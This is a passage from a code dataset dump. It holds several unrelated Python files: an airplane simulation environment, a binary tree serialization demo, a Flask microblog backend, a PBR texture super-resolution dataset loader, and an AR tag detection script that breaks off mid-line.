_cmd_flightpath_rad = None\r\n _cmd_vel_mps = None\r\n\r\n _tau_bank_s = None\r\n _tau_flightpath_s = None\r\n _tau_vel_s = None\r\n\r\n _dt = 0.05 # seconds\r\n _t = 0.\r\n\r\n def __init__(self, position=np.array([0., 0., 0]),\r\n heading_deg=0.,\r\n vel_mps=0):\r\n\r\n self.reset()\r\n self._pos_m = position\r\n self._pos_history[0, :] = position\r\n self._heading_rad = np.deg2rad(heading_deg)\r\n self._vel_mps = vel_mps\r\n\r\n def reset(self):\r\n self._pos_m = np.zeros((1, 3), dtype=float) # pos X,Y,Z\r\n self._pos_history = np.zeros((1, 3), dtype=float) # pos X,Y,Z\r\n self._vel_mps = 0.\r\n\r\n self._bank_rad = 0.\r\n self._flightpath_rad = 0.\r\n self._heading_rad = 0.\r\n\r\n self._cmd_vel_mps = 0.\r\n self._cmd_flightpath_rad = 0.\r\n self._cmd_bank_rad = 0.\r\n\r\n self._tau_bank_s = 0.05\r\n self._tau_flightpath_s = 0.05\r\n self._tau_vel_s = 1.5\r\n\r\n self._t = 0.\r\n\r\n def get_sta(self):\r\n\r\n return np.array([self._pos_m.copy(),\r\n self._vel_mps,\r\n np.array([self._bank_rad, self._flightpath_rad, self._heading_rad], dtype=object),\r\n self._pos_history], dtype=object)\r\n\r\n def set_cmd_bank(self, cmd_deg):\r\n self._cmd_bank_rad = np.deg2rad(_pi_bound_deg(cmd_deg))\r\n\r\n def set_cmd_flightpath(self, flightpath_deg):\r\n self._cmd_flightpath_rad = np.deg2rad(_pi_bound_deg(flightpath_deg))\r\n\r\n def set_cmd_vel(self, cmd_mps):\r\n if cmd_mps < 0:\r\n cmd_mps = 0\r\n\r\n self._cmd_vel_mps = cmd_mps\r\n\r\n def simfor(self, Time_s):\r\n\r\n startTime = self._t\r\n while self._t < (startTime + Time_s):\r\n\r\n vx = self._vel_mps * np.cos(self._flightpath_rad) * np.cos(self._heading_rad)\r\n vy = self._vel_mps * np.cos(self._flightpath_rad) * np.sin(self._heading_rad)\r\n vz = -self._vel_mps * np.sin(self._flightpath_rad)\r\n\r\n self._pos_m[0] = self._pos_m[0] + self._dt * vx\r\n self._pos_m[1] = self._pos_m[1] + self._dt * vy\r\n self._pos_m[2] = self._pos_m[2] + self._dt * vz\r\n\r\n if self._vel_mps > 0: # eger bir hiz varsa degisim olacak aksi durumda sifira bolme\r\n heading_dot_rad = 9.81 / self._vel_mps * np.tan(self._bank_rad) * np.cos(self._flightpath_rad)\r\n else:\r\n heading_dot_rad = 0\r\n bank_dot = (self._cmd_bank_rad - self._bank_rad) / self._tau_bank_s\r\n flightpath_dot = (self._cmd_flightpath_rad - self._flightpath_rad) / self._tau_flightpath_s\r\n vel_dot = (self._cmd_vel_mps - self._vel_mps) / self._tau_vel_s\r\n\r\n self._bank_rad += self._dt * bank_dot\r\n self._flightpath_rad += self._dt * flightpath_dot\r\n self._heading_rad += self._dt * heading_dot_rad\r\n self._vel_mps += self._dt * vel_dot\r\n\r\n self._pos_history = np.append( self._pos_history, [self._pos_m], axis=0 )\r\n #self._pos_history = np.concatenate((self._pos_history, self._pos_m), axis=0)\r\n\r\n self._t += self._dt\r\n\r\n return np.array([self._pos_m.copy(),\r\n self._vel_mps,\r\n np.array([self._bank_rad, self._flightpath_rad, self._heading_rad], dtype=object),\r\n self._pos_history], dtype=object)\r\n\r\n def sim(self, simTime_s):\r\n\r\n self.reset()\r\n return self.simfor(simTime_s)\r\n\r\n def takeaction(self, cmd_bank_deg, cmd_flightpath, cmd_vel_mps, actiontime=1):\r\n\r\n self.set_cmd_bank(cmd_bank_deg)\r\n self.set_cmd_flightpath(cmd_flightpath)\r\n self.set_cmd_vel(cmd_vel_mps)\r\n\r\n return self.simfor(actiontime) # sim for 5 seconds to get the results of an action\r\n","repo_name":"hasanisci/gym-dubins-ac","sub_path":"gym-dubins-airplane/gym_dubins_airplane/envs/ACEnvironment.py","file_name":"ACEnvironment.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"9529839388","text":"'''\n先序遍历DLR:根节点->左子树->右子树\n中序遍历LDR:左子树->根节点->右子树\n后续遍历LRD:左子树->右子树->根节点\n层次遍历:用一维数组存储二叉树时,总是以层次遍历的顺序存储结点。层次遍历应该借助队列。\n\n'''\n\nclass Node():\n def __init__(self, root=None, left=None, right=None):\n self.__root = root\n self.__left = left\n self.__right = right\n\n @property\n def root(self):\n return self.__root\n\n @property\n def left(self):\n return self.__left\n\n @property\n def right(self):\n return self.__right\n\n\nclass TreeTraverse():\n def _pre(self, tree):\n if not tree:\n return '#_'\n res = tree.root + '_'\n res += self._pre(tree.left)\n res += self._pre(tree.right)\n return res\n\n def _rec(self, tree_string):\n def _rec_str(value):\n print(value)\n key = value.pop(0)\n if key == '#':\n return None\n root = Node(key, _rec_str(value), _rec_str(value))\n return root\n\n value = tree_string.split('_')\n return _rec_str(value)\n\n\nif __name__ == '__main__':\n '''\n A\n / \\\n B C\n / \\ \\\n D E F\n /\n G\n 递归过程 ABDDDBEEEBACCFGGGFFCA\n 前序 各元素第一次出现的时候打印 ABDECFG\n 中序 各元素第二次出现的时候打印 DBEACGF\n 后序 各元素第三次出现的时候打印 DEBGFCA\n '''\n ct = Node('A',Node('B',Node('D'),Node('E')),Node('C',right=Node('F',Node('G'))))\n print('前序--->')\n tt = TreeTraverse()\n print(tt._pre(ct))\n cct = tt._rec('A_B_D_#_#_E_#_#_C_#_F_G_#_#_#_')\n","repo_name":"imlifeilong/MyAlgorithm","sub_path":"basic/二叉树/二叉树-序列化反序列化.py","file_name":"二叉树-序列化反序列化.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28609611359","text":"from flask import Flask, request, jsonify, current_app\nfrom flask.json import JSONEncoder\nfrom sqlalchemy import create_engine, text\n\n## Default JSON encoder는 set를 JSON으로 변환할 수 없다.\n## 그럼으로 커스텀 엔코더를 작성해서 set을 list로 변환하여\n## JSON으로 변환 가능하게 해주어야 한다.\nclass CustomJSONEncoder(JSONEncoder):\n def default(self, obj):\n if isinstance(obj, set):\n return list(obj)\n\n return JSONEncoder.default(self, obj)\n\ndef get_user(user_id):\n user = current_app.database.execute(text(\"\"\"\n SELECT \n id,\n name,\n email,\n profile\n FROM users\n WHERE id = :user_id\n \"\"\"), {\n 'user_id' : user_id \n }).fetchone()\n\n return {\n 'id' : user['id'],\n 'name' : user['name'],\n 'email' : user['email'],\n 'profile' : user['profile']\n } if user else None\n\ndef insert_user(user):\n return current_app.database.execute(text(\"\"\"\n INSERT INTO users (\n name,\n email,\n profile,\n hashed_password\n ) VALUES (\n :name,\n :email,\n :profile,\n :password\n )\n \"\"\"), user).lastrowid\n\ndef insert_tweet(user_tweet):\n return current_app.database.execute(text(\"\"\"\n INSERT INTO tweets (\n user_id,\n tweet\n ) VALUES (\n :id,\n :tweet\n )\n \"\"\"), user_tweet).rowcount\n\ndef insert_follow(user_follow):\n return current_app.database.execute(text(\"\"\"\n INSERT INTO users_follow_list (\n user_id,\n follow_user_id\n ) VALUES (\n :id,\n :follow\n )\n \"\"\"), user_follow).rowcount\n\ndef insert_unfollow(user_unfollow):\n return current_app.database.execute(text(\"\"\"\n DELETE FROM users_follow_list\n WHERE user_id = :id\n AND follow_user_id = :unfollow\n \"\"\"), user_unfollow).rowcount\n\ndef get_timeline(user_id):\n timeline = current_app.database.execute(text(\"\"\"\n SELECT \n t.user_id,\n t.tweet\n FROM tweets t\n LEFT JOIN users_follow_list ufl ON ufl.user_id = :user_id\n WHERE t.user_id = :user_id \n OR t.user_id = ufl.follow_user_id\n \"\"\"), {\n 'user_id' : user_id \n }).fetchall()\n\n return [{\n 'user_id' : tweet['user_id'],\n 'tweet' : tweet['tweet']\n } for tweet in timeline]\n\ndef create_app(test_config = None):\n app = Flask(__name__)\n\n app.json_encoder = CustomJSONEncoder\n\n if test_config is None:\n app.config.from_pyfile(\"config.py\")\n else:\n app.config.update(test_config)\n\n database = create_engine(app.config['DB_URL'], encoding = 'utf-8', max_overflow = 0)\n app.database = database\n\n @app.route(\"/ping\", methods=['GET'])\n def ping():\n return \"pong\"\n\n @app.route(\"/sign-up\", methods=['POST'])\n def sign_up():\n new_user = request.json\n new_user_id = insert_user(new_user)\n new_user = get_user(new_user_id)\n\n return jsonify(new_user)\n\n @app.route('/tweet', methods=['POST'])\n def tweet():\n user_tweet = request.json\n tweet = user_tweet['tweet']\n\n if len(tweet) > 300:\n return '300자를 초과했습니다', 400\n\n insert_tweet(user_tweet)\n\n return '', 200\n\n @app.route('/follow', methods=['POST'])\n def follow():\n payload = request.json\n insert_follow(payload) \n\n return '', 200\n\n @app.route('/unfollow', methods=['POST'])\n def unfollow():\n payload = request.json\n insert_unfollow(payload)\n\n return '', 200\n\n @app.route('/timeline/', methods=['GET'])\n def timeline(user_id):\n return jsonify({\n 'user_id' : user_id,\n 'timeline' : get_timeline(user_id)\n })\n\n return app\n\n","repo_name":"rampart81/python-backend-book","sub_path":"chapter6/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"32"} +{"seq_id":"5463199703","text":"import os.path\n# import glob\nimport random\nimport numpy as np\nimport cv2\nimport torch\n# import torch.utils.data as data\nfrom torch.utils.data.dataset import Dataset\nimport dataops.common as util\n\n# import dataops.augmentations as augmentations #TMP\nfrom dataops.augmentations import Scale, NoisePatches, RandomNoisePatches, get_blur, get_noise, get_pad\nfrom dataops.debug import tmp_vis, describe_numpy, describe_tensor\n\nimport dataops.augmennt.augmennt as transforms\n\n\n\nclass LRHRDataset(Dataset):\n '''\n Read PBR images.\n '''\n\n def __init__(self, opt):\n super(LRHRDataset, self).__init__()\n self.opt = opt\n self.paths_LR, self.paths_HR = None, None\n self.output_sample_imgs = None\n\n if opt.get('dataroot_kernels', None) and 999 in opt[\"lr_downscale_types\"]:\n self.ds_kernels = transforms.ApplyKernel(\n scale=opt.get('scale', 4), kernels_path=opt['dataroot_kernels'], pattern='kernelgan')\n else:\n self.ds_kernels = None\n\n if opt['phase'] == 'train' and opt.get('lr_noise_types', 3) and \"patches\" in opt['lr_noise_types']:\n assert opt['noise_data']\n self.noise_patches = NoisePatches(opt['noise_data'], opt.get('HR_size', 128)/opt.get('scale', 4))\n else:\n self.noise_patches = None\n\n # Get dataroot_HR\n self.paths_HR = opt.get('dataroot_HR', None)\n if self.paths_HR:\n # self.pbr_list = os.listdir(self.paths_HR)\n # print(self.paths_HR)\n self.pbr_list = []\n for root,dirs,files in os.walk(self.paths_HR):\n if files and not dirs:\n self.pbr_list.append(root)\n # print(self.pbr_list)\n \n # Get dataroot_LR\n self.paths_LR = opt.get('dataroot_LR', None)\n\n def __getitem__(self, index):\n HR_path, LR_path = None, None\n scale = self.opt.get('scale', 4)\n HR_size = self.opt.get('HR_size', 128)\n if HR_size:\n LR_size = HR_size // scale\n \n # Default case: tensor will result in the [0,1] range\n # Alternative: tensor will be z-normalized to the [-1,1] range\n znorm = self.opt.get('znorm', False)\n\n # get a random pbr directory\n # idx_pbr = random.randint(0, len(self.pbr_list)-1)\n # pbr_dir = self.pbr_list[idx_pbr]\n pbr_dir = self.pbr_list[index]\n # print(pbr_dir)\n\n #TODO: TMP os problem\n # import os\n # cur_dir = os.path.join(self.paths_HR, pbr_dir)\n cur_dir = pbr_dir\n dir_content = os.listdir(cur_dir)\n # print(dir_content)\n\n ######## Read the images ########\n diffuse_img = None\n albedo_img = None\n ao_img = None\n glossiness_img = None\n height_img = None\n metalness_img = None\n normal_img = None\n reflection_img = None\n roughness_img = None\n\n for source in dir_content:\n #TODO: handle uppercase names\n source = source.lower()\n #ref: https://marmoset.co/posts/pbr-texture-conversion/\n if source.find('_diffuse.') >= 0 or source.find('_color.') >= 0:\n diffuse_img = util.read_img(None, os.path.join(cur_dir, source), out_nc=3)\n if self.paths_LR:\n cur_dir_lr = os.path.join(self.paths_LR, pbr_dir)\n diffuse_img_lr = util.read_img(None, os.path.join(cur_dir_lr, source), out_nc=3)\n else:\n diffuse_img_lr = diffuse_img\n elif source.find('_albedo.') >= 0:\n albedo_img = util.read_img(None, os.path.join(cur_dir, source), out_nc=3)\n elif source.find('_ao.') >= 0 or source.find('_occlusion.') >= 0 or source.find('_ambientocclusion.') >= 0:\n ao_img = util.read_img(None, os.path.join(cur_dir, source), out_nc=1)\n elif source.find('_height.') >= 0 or source.find('_displacement.') >= 0 or source.find('_bump.') >= 0:\n height_img = util.read_img(None, os.path.join(cur_dir, source), out_nc=1)\n elif source.find('_metalness.') >= 0:\n metalness_img = util.read_img(None, os.path.join(cur_dir, source), out_nc=1)\n elif source.find('_normal.') >= 0:\n normal_img = util.read_img(None, os.path.join(cur_dir, source), out_nc=3)\n elif source.find('_reflection.') >= 0:\n reflection_img = util.read_img(None, os.path.join(cur_dir, source), out_nc=1)\n elif source.find('_roughness.') >= 0:\n roughness_img = util.read_img(None, os.path.join(cur_dir, source), out_nc=1)\n elif source.find('_glossiness.') >= 0 and not isinstance(roughness_img, np.ndarray):\n # glossiness_img = util.read_img(None, os.path.join(cur_dir, source), out_nc=1)\n roughness_img = 255 - util.read_img(None, os.path.join(cur_dir, source), out_nc=1)\n \n # if isinstance(albedo_img, np.ndarray) and isinstance(ao_img, np.ndarray) and not isinstance(diffuse_img, np.ndarray):\n # diffuse_img = albedo_img - (255 - ao_img)\n # diffuse_img_lr = diffuse_img\n if isinstance(albedo_img, np.ndarray) and not isinstance(diffuse_img, np.ndarray):\n diffuse_img = albedo_img\n diffuse_img_lr = diffuse_img\n albedo_img = None\n\n # if isinstance(diffuse_img, np.ndarray):\n # tmp_vis(diffuse_img, False)\n # if isinstance(diffuse_img_lr, np.ndarray):\n # tmp_vis(diffuse_img_lr, False)\n # if isinstance(albedo_img, np.ndarray):\n # tmp_vis(albedo_img, False)\n # if isinstance(ao_img, np.ndarray):\n # tmp_vis(ao_img, False)\n # if isinstance(height_img, np.ndarray):\n # tmp_vis(height_img, False)\n # if isinstance(metalness_img, np.ndarray):\n # tmp_vis(metalness_img, False)\n # if isinstance(normal_img, np.ndarray):\n # tmp_vis(normal_img, False)\n # if isinstance(reflection_img, np.ndarray):\n # tmp_vis(reflection_img, False)\n # if isinstance(roughness_img, np.ndarray):\n # tmp_vis(roughness_img, False)\n \n ######## Modify the images ########\n \n # HR modcrop in the validation / test phase\n # if self.opt['phase'] != 'train':\n # img_HR = util.modcrop(img_HR, scale)\n \n ######## Augmentations ########\n \n #Augmentations during training\n if self.opt['phase'] == 'train':\n \n # Or if the HR images are too small, fix to the HR_size size and fit LR pair to LR_size too\n dim_change = self.opt.get('dim_change', 'pad')\n if diffuse_img.shape[0] < HR_size or diffuse_img.shape[1] < HR_size:\n if dim_change == \"resize\":\n # rescale HR image to the HR_size \n diffuse_img = transforms.Resize((HR_size, HR_size), interpolation=\"BILINEAR\")(np.copy(diffuse_img))\n # rescale LR image to the LR_size (The original code discarded the diffuse_img_lr and generated a new one on the fly from diffuse_img)\n diffuse_img_lr = transforms.Resize((LR_size, LR_size), interpolation=\"BILINEAR\")(np.copy(diffuse_img_lr))\n elif dim_change == \"pad\":\n # if diffuse_img_lr is diffuse_img, padding will be wrong, downscaling LR before padding\n if diffuse_img_lr.shape[0] != diffuse_img.shape[0]//scale or diffuse_img_lr.shape[1] != diffuse_img.shape[1]//scale:\n ds_algo = 777 # default to matlab-like bicubic downscale\n if self.opt.get('lr_downscale', None): # if manually set and scale algorithms are provided, then:\n ds_algo = self.opt.get('lr_downscale_types', 777)\n if self.opt.get('lr_downscale', None) and self.opt.get('dataroot_kernels', None) and 999 in self.opt[\"lr_downscale_types\"]:\n ds_kernel = self.ds_kernels\n else:\n ds_kernel = None\n diffuse_img_lr, _ = Scale(img=diffuse_img_lr, scale=scale, algo=ds_algo, ds_kernel=ds_kernel)\n \n HR_pad, fill = get_pad(diffuse_img, HR_size, fill='random', padding_mode=self.opt.get('pad_mode', 'constant'))\n diffuse_img = HR_pad(np.copy(diffuse_img))\n \n LR_pad, _ = get_pad(diffuse_img_lr, HR_size//scale, fill=fill, padding_mode=self.opt.get('pad_mode', 'constant'))\n diffuse_img_lr = LR_pad(np.copy(diffuse_img_lr))\n \n # (Randomly) scale LR (from HR) during training if :\n # - LR dataset is not provided\n # - LR dataset is not in the correct scale\n # - Also to check if LR is not at the correct scale already (if img_LR was changed to img_HR)\n if diffuse_img_lr.shape[0] != LR_size or diffuse_img_lr.shape[1] != LR_size:\n ds_algo = 777 # default to matlab-like bicubic downscale\n if self.opt.get('lr_downscale', None): # if manually set and scale algorithms are provided, then:\n ds_algo = self.opt.get('lr_downscale_types', 777)\n else: # else, if for some reason diffuse_img_lr is too large, default to matlab-like bicubic downscale\n #if not self.opt['aug_downscale']: #only print the warning if not being forced to use HR images instead of LR dataset (which is a known case)\n print(\"LR image is too large, auto generating new LR for: \", LR_path)\n if self.opt.get('lr_downscale', None) and self.opt.get('dataroot_kernels', None) and 999 in self.opt[\"lr_downscale_types\"]:\n ds_kernel = self.ds_kernels #KernelDownscale(scale, self.kernel_paths, self.num_kernel)\n else:\n ds_kernel = None\n diffuse_img_lr, _ = Scale(img=diffuse_img_lr, scale=scale, algo=ds_algo, ds_kernel=ds_kernel)\n\n # Random Crop (reduce computing cost and adjust images to correct size first)\n if diffuse_img.shape[0] > HR_size or diffuse_img.shape[1] > HR_size:\n #Here the scale should be in respect to the images, not to the training scale (in case they are being scaled on the fly)\n hr_crop_params, lr_crop_params = get_crop_params(diffuse_img, LR_size, scale)\n diffuse_img, _ = apply_crop_params(HR=diffuse_img, LR=None, hr_crop_params=hr_crop_params, lr_crop_params=None)\n _, diffuse_img_lr = apply_crop_params(HR=None, LR=diffuse_img_lr, hr_crop_params=None, lr_crop_params=lr_crop_params)\n albedo_img, _ = apply_crop_params(HR=albedo_img, LR=None, hr_crop_params=hr_crop_params, lr_crop_params=None)\n ao_img, _ = apply_crop_params(HR=ao_img, LR=None, hr_crop_params=hr_crop_params, lr_crop_params=None)\n height_img, _ = apply_crop_params(HR=height_img, LR=None, hr_crop_params=hr_crop_params, lr_crop_params=None)\n metalness_img, _ = apply_crop_params(HR=metalness_img, LR=None, hr_crop_params=hr_crop_params, lr_crop_params=None)\n normal_img, _ = apply_crop_params(HR=normal_img, LR=None, hr_crop_params=hr_crop_params, lr_crop_params=None)\n reflection_img, _ = apply_crop_params(HR=reflection_img, LR=None, hr_crop_params=hr_crop_params, lr_crop_params=None)\n roughness_img, _ = apply_crop_params(HR=roughness_img, LR=None, hr_crop_params=hr_crop_params, lr_crop_params=None)\n\n # Below are the On The Fly augmentations\n \n # Apply unsharpening mask to HR images\n if self.opt.get('hr_unsharp_mask', None):\n hr_rand_unsharp = self.opt.get('hr_rand_unsharp', 0)\n diffuse_img_lr = transforms.FilterUnsharp(p=hr_rand_unsharp)(diffuse_img_lr)\n \n # Add blur if LR blur AND blur types are provided, else will skip\n if self.opt.get('lr_blur', None):\n blur_option = get_blur(self.opt.get('lr_blur_types', None))\n if blur_option:\n diffuse_img_lr = blur_option(diffuse_img_lr)\n \n # LR primary noise: Add noise to LR if enabled AND noise types are provided, else will skip\n if self.opt.get('lr_noise', None):\n noise_option = get_noise(self.opt.get('lr_noise_types', None), self.noise_patches)\n if noise_option:\n diffuse_img_lr = noise_option(diffuse_img_lr)\n\n # LR secondary noise: Add additional noise to LR if enabled AND noise types are provided, else will skip\n if self.opt.get('lr_noise2', None):\n noise_option = get_noise(self.opt.get('lr_noise_types2', None), self.noise_patches)\n if noise_option:\n diffuse_img_lr = noise_option(diffuse_img_lr)\n\n dataset_out = {}\n if isinstance(diffuse_img, np.ndarray):\n # tmp_vis(diffuse_img, False)\n diffuse_img = util.np2tensor(diffuse_img, normalize=znorm, add_batch=False)\n # tmp_vis(diffuse_img, True)\n dataset_out['HR'] = diffuse_img\n dataset_out['HR_path'] = cur_dir\n if isinstance(diffuse_img_lr, np.ndarray):\n # tmp_vis(diffuse_img, False)\n diffuse_img_lr = util.np2tensor(diffuse_img_lr, normalize=znorm, add_batch=False)\n # tmp_vis(diffuse_img, True)\n dataset_out['LR'] = diffuse_img_lr\n dataset_out['LR_path'] = cur_dir\n if isinstance(albedo_img, np.ndarray):\n # tmp_vis(albedo_img, False)\n albedo_img = util.np2tensor(albedo_img, normalize=znorm, add_batch=False)\n # tmp_vis(ao_img, True)\n dataset_out['AL'] = albedo_img\n if isinstance(ao_img, np.ndarray):\n # tmp_vis(ao_img, False)\n ao_img = util.np2tensor(ao_img, normalize=znorm, add_batch=False)\n # tmp_vis(ao_img, True)\n dataset_out['AO'] = ao_img\n if isinstance(height_img, np.ndarray):\n # tmp_vis(height_img, False)\n height_img = util.np2tensor(height_img, normalize=znorm, add_batch=False)\n dataset_out['HE'] = height_img\n if isinstance(metalness_img, np.ndarray):\n # tmp_vis(metalness_img, False)\n metalness_img = util.np2tensor(metalness_img, normalize=znorm, add_batch=False)\n dataset_out['ME'] = metalness_img\n if isinstance(normal_img, np.ndarray):\n # tmp_vis(normal_img, False)\n normal_img = util.np2tensor(normal_img, normalize=znorm, add_batch=False)\n dataset_out['NO'] = normal_img\n if isinstance(reflection_img, np.ndarray):\n # tmp_vis(reflection_img, False)\n reflection_img = util.np2tensor(reflection_img, normalize=znorm, add_batch=False)\n dataset_out['RE'] = reflection_img\n if isinstance(roughness_img, np.ndarray):\n # tmp_vis(roughness_img, False)\n roughness_img = util.np2tensor(roughness_img, normalize=znorm, add_batch=False)\n dataset_out['RO'] = roughness_img\n\n return dataset_out\n\n def __len__(self):\n return len(self.pbr_list)\n\n\ndef get_crop_params(img, patch_size_lr, scale):\n h_hr, w_hr, _ = img.shape\n h_lr = h_hr // scale\n w_lr = w_hr // scale\n idx_h = random.randint(10, h_lr - patch_size_lr - 10)\n idx_w = random.randint(10, w_lr - patch_size_lr - 10)\n\n h_start_hr = (idx_h - 1) * scale\n h_end_hr = (idx_h - 1 + patch_size_lr) * scale\n w_start_hr = (idx_w - 1) * scale\n w_end_hr = (idx_w - 1 + patch_size_lr) * scale\n\n h_start_lr = idx_h - 1\n h_end_lr = idx_h - 1 + patch_size_lr\n w_start_lr = idx_w - 1\n w_end_lr = idx_w - 1 + patch_size_lr\n \n hr_crop_params = [h_start_hr, h_end_hr, w_start_hr, w_end_hr]\n lr_crop_params = [h_start_lr, h_end_lr, w_start_lr, w_end_lr]\n \n return hr_crop_params, lr_crop_params\n\ndef apply_crop_params(HR=None, LR=None, hr_crop_params=None, lr_crop_params=None):\n if isinstance(HR, np.ndarray) and hr_crop_params:\n (h_start_hr, h_end_hr, w_start_hr, w_end_hr) = hr_crop_params\n HR = HR[h_start_hr:h_end_hr, w_start_hr:w_end_hr]\n else:\n HR = None\n \n if isinstance(LR, np.ndarray) and lr_crop_params:\n (h_start_lr, h_end_lr, w_start_lr, w_end_lr) = lr_crop_params\n LR = LR[h_start_lr:h_end_lr, w_start_lr:w_end_lr]\n else:\n LR = None\n \n return HR, LR","repo_name":"victorca25/traiNNer","sub_path":"codes/data/LRHRPBR_dataset.py","file_name":"LRHRPBR_dataset.py","file_ext":"py","file_size_in_byte":16719,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"32"} +{"seq_id":"39748008278","text":"from unittest import skip\nimport numpy as np\nfrom numpy import linalg as LA\nfrom scipy import fftpack\nimport matplotlib.pyplot as plt\nimport cv2\nimport math\nfrom PIL import Image as im\nfrom numpy.linalg import inv\n\nclass AR_Detect:\n def __init__(self):\n self.result = cv2.VideoWriter('filename.avi', \n cv2.VideoWriter_fourcc(*'MJPG'),\n 10, (1920, 1080))\n\n def gethomographyMat(self, cornerList, desiredCoordinates,img1):\n A = np.array([[cornerList[0][0], cornerList[0][1], 1, 0, 0, 0, -cornerList[0][0]*desiredCoordinates[0][0], -cornerList[0][1]*desiredCoordinates[0][0], -desiredCoordinates[0][0]], \n [0, 0, 0, cornerList[0][0], cornerList[0][1], 1, -cornerList[0][0]*desiredCoordinates[0][1], -cornerList[0][1]*desiredCoordinates[0][1], -desiredCoordinates[0][1]],\n\n [cornerList[1][0], cornerList[1][1], 1, 0, 0, 0, -cornerList[1][0]*desiredCoordinates[1][0], -cornerList[1][1]*desiredCoordinates[1][0], -desiredCoordinates[1][0]],\n [0, 0, 0, cornerList[1][0], cornerList[1][1], 1, -cornerList[1][0]*desiredCoordinates[1][0], -cornerList[1][1]*desiredCoordinates[1][1], -desiredCoordinates[1][1]],\n \n [cornerList[2][0], cornerList[2][1], 1, 0, 0, 0, -cornerList[2][0]*desiredCoordinates[2][0], -cornerList[2][1]*desiredCoordinates[2][0], -desiredCoordinates[2][0]],\n [0, 0, 0, cornerList[2][0], cornerList[2][1], 1, -cornerList[2][0]*desiredCoordinates[2][0], -cornerList[2][1]*desiredCoordinates[2][1], -desiredCoordinates[2][1]],\n \n [cornerList[3][0], cornerList[3][1], 1, 0, 0, 0, -cornerList[3][0]*desiredCoordinates[3][0], -cornerList[3][1]*desiredCoordinates[3][0], -desiredCoordinates[3][0]],\n [0, 0, 0, cornerList[3][0], cornerList[3][1], 1, -cornerList[3][0]*desiredCoordinates[3][0], -cornerList[3][1]*desiredCoordinates[3][1], -desiredCoordinates[3][1]],\n \n ])\n u, s, vh = np.linalg.svd(A)\n homographyMat = np.reshape(vh[8], (3, 3))\n # print(A.dot(vh.T))\n self.pMatrix(homographyMat, desiredCoordinates, cornerList, img1)\n \n def pMatrix(self, homographyMat, cornerList, c, img1):\n K = np.array([[1346.100595, 0, 932.1633975],\n [0, 1355.933136, 654.8986796],\n [0, 0, 1]])\n # print(homographyMat)\n homographyMat = inv(homographyMat)\n # print(homographyMat[:, 0])\n lambda_ = 1/((np.linalg.norm(np.matmul(inv(K), homographyMat[:, 0])) + np.linalg.norm(np.matmul(inv(K),homographyMat[:, 1]))/2))\n B_dash = (inv(K).dot(homographyMat))\n \n # print(lambda_)\n if np.linalg.det(B_dash) < 0:\n B_dash = -B_dash\n B = lambda_*B_dash\n r1 = B[:,0]\n r2 = B[:,1]\n r3 = np.cross(r1, r2)\n t = B[:,2]\n R = np.array([r1, r2, r3, t]).T\n P = K.dot(R)\n P1 = P.dot(np.array([[cornerList[0][0]], [cornerList[0][1]], [-200], [1]]))\n P2 = P.dot(np.array([[cornerList[1][0]], [cornerList[1][1]], [-200], [1]]))\n P3 = P.dot(np.array([[cornerList[2][0]], [cornerList[2][1]], [-200], [1]]))\n P4 = P.dot(np.array([[cornerList[3][0]], [cornerList[3][1]], [-200], [1]]))\n \n P1_x = P1[0]/P1[2]\n P1_y = P1[1]/P1[2]\n\n P2_x = P2[0]/P2[2]\n P2_y = P2[1]/P2[2]\n \n P3_x = P3[0]/P3[2]\n P3_y = P3[1]/P3[2]\n \n P4_x = P4[0]/P4[2]\n P4_y = P4[1]/P4[2]\n \n color = (0, 255, 0)\n \n # Line thickness of 9 px\n thickness = 9\n img1 = cv2.line(img1, (P1_x, P1_y), (P2_x, P2_y), color, thickness)\n img1 = cv2.line(img1, (P1_x, P1_y), (P3_x, P3_y), color, thickness)\n img1 = cv2.line(img1, (P3_x, P3_y), (P4_x, P4_y), color, thickness)\n img1 = cv2.line(img1, (P2_x, P2_y), (P4_x, P4_y), color, thickness)\n\n img1 = cv2.line(img1, (P1_x, P1_y), c[0], color, thickness)\n img1 = cv2.line(img1, (P2_x, P2_y), c[1], color, thickness)\n img1 = cv2.line(img1, (P3_x, P3_y), c[2], color, thickness)\n img1 = cv2.line(img1, (P4_x, P4_y), c[3], color, thickness)\n \n img1 = cv2.line(img1, c[1], c[0], color, thickness)\n img1 = cv2.line(img1, c[3], c[1], color, thickness)\n img1 = cv2.line(img1, c[3], c[2], color, thickness)\n img1 = cv2.line(img1, c[0], c[2], color, thickness)\n #self.result.write(img1)\n \n cv2.imshow(\"frame\", img1)\n if cv2.waitKey(1) & 0xff == ord('q'):\n cv2.destroyAllWindows()\n\n def cornerDetector(self):\n cap = cv2.VideoCapture('1tagvideo.mp4')\n \n # Check if camera opened successfully\n if (cap.isOpened()== False): \n print(\"Error opening video file\")\n \n # Read until video is completed\n while(cap.isOpened()):\n ret, img = cap.read()\n if ret == True:\n #img = cv2.imread('frame2.jpg')\n img1 = img\n gray = cv2.cvtColor(img.copy(), cv2.COLOR_BGR2GRAY)\n gray = cv2.bilateralFilter(gray, 15, 75, 75)\n ret,img = cv2.threshold(gray,150,255,cv2.THRESH_BINARY)\n img = cv2.medianBlur(img,5)\n kernel = np.ones((5,5), np.uint8)\n img = cv2.dilate(img, kernel, iterations=2)\n gray = np.float32(gray)\n \n h, w = img.shape[:2]\n mask = np.zeros((h+2, w+2), np.uint8)\n cv2.floodFill(img, mask, (0,0), 255)\n \n corners = cv2.goodFeaturesToTrack(img,25,0.01,10)\n corners = np.int0(corners)\n \n ext0 = tuple(corners[corners[:, :, 1].argmin()][0])\n ext1 = tuple(corners[corners[:, :, 1].argmax()][0])\n ext2 = tuple(corners[corners[:, :, 0].argmin()][0])\n ext3 = tuple(corners[corners[:, :, 0].argmax()][0])\n\n y_min = tuple(corners[corners[:, :, 1].argmin()][0])[1]\n y_max = tuple(corners[corners[:, :, 1].argmax()][0])[1]\n x_min = tuple(corners[corners[:, :, 0].argmin()][0])[0]\n x_max = tuple(corners[corners[:, :, 0].argmax()][0])[0]\n\n color = (0, 255, 0)\n img1 = cv2.circle(img1, ext0, 5, color, -1)\n img1 = cv2.circle(img1, ext1, 5, color, -1)\n img1 = cv2.circle(img1, ext2, 5, color, -1)\n img1 = 